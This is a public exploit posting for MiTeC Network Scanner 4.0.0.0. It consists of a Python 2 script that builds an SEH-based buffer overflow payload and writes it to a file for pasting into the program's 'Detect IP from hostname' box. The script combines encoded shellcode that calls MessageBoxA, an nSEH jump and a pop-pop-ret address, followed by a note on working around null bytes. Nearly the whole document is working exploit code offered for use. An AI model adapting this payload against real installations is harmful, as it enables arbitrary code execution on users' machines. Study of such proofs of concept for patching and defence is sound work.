Network Scanner 4.0.0.0 SEH Overflow

Posted Oct 25, 2016
Authored by n30m1nd

Network Scanner version 4.0.0.0 SEH overflow exploit.

tags | exploit, overflow
SHA-256 | 85c3395f61aff99ba26155551063c1e183aaf9399f6541a8426dcf9216803c46

#!/usr/bin/python
# -*- coding: utf-8 -*-

### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###

# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
# https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time

# Exploit code
# ============

import struct

# MessageBoxA in NetScan.exe => 004042F1
mbox = (
    "\x25\x41\x41\x41"
    "\x41\x25\x32\x32"
    "\x32\x32\x50\x68"
    "\x70\x77\x6E\x64"
    "\x54\x5F\x50\x57"
    "\x57\x50\x35\x8E"
    "\x60\x60\x55\x35"
    "\x7F\x22\x20\x55"
    "\x50\xC3"
)
# JUMP BACK to our shellcode!
nseh = (
    # xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
    "\x34\x51"
    # jne -32h; Jump if ZF = 0
    "\x75\xCC"
)
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)

# Buffer layout: 28 bytes of filler, mbox padded out to 48 bytes, then nSEH + SEH
payl = "A" * (76-48)
payl += mbox
payl += "A" * (48-len(mbox))
payl += nseh + sehh

# Python 2: str is bytes here, so the raw payload can be written as-is
with open("exploit.txt", "wb") as f:
    f.write(payl[:-1])
print payl

"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""
